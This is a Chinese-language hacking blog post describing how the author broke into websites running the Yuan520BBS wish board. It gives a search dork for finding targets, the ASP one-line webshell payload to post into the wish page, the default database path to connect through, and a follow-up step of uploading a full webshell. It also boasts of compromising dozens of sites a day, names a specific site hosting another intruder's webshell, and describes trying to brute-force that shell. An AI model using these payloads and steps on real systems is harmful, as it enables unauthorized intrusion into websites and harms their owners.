小编推荐更多关于黑客基础内容的文章:
大家好,今天把自己入侵Yuan520BBS许愿版的过程总结一下。思路其实也很简单,就是利用了Yuan520BBS许愿版的默认数据库,写入一句话进行连接。
1 第一步当然是搜索了。关键词选“Powered By Yuan520BBS”,会出来一大堆“『购物商城』论坛 - Powered By Yuan520BBS”的网站,随便挑一个,假设为http://xxx.yyy。
2 去许愿版写一句话马,许愿版的网页一般是 http://xxx.yyy/bbs/wish1/wish.asp,强调一下一句话马是<%execute request("value")%>,里面的value不要改。我以前总不成功,就是因为改value了。
3 用一句话客户端连接数据库。许愿版的默认数据库地址是http://xxx.yyy/bbs/database/%23wish.asp,你可以打开这个连接看看,如果是一堆乱码,那就没错。如果不是,去暴库吧。我图省事,没去暴库,再说暴库成功率也不高,默认的数据库足够用了。
4 最后一步,传马,呵呵,就不用我说了吧。看到可爱的小马出现,心里真是激动啊。相信,再菜的鸟看完教程也知道怎么做了。
这个漏洞看起来很简单,但后果确是很严重的,因为比较容易*作。默认数据库漏洞很具有普遍性,举一反三我们能入侵大量站点。如果再结合挖掘鸡、网站猎手,一天拿下几十个网站不成问题,思路的确很重要,大家不要蛮干阿。
有趣的是,有个叫小白的朋友在我前面攻入网站,而且堵上后门,但被我把网马挖出来了,http://dh123.com/database/help.asp ,希望小白兄别见怪阿,因为help.asp明显就是一句话马传上去的嘛,呵呵。出于好玩用accessdriver试了试爆破,但没成功,这个网马只有一个密码框,还是很适合爆破的,就是我的字典差点。
|
软件频道-工具软件&网络安全精品推荐 | |||
 |
 |
 |
 |
 |
 |
 |
|
关注此文的读者还看过:
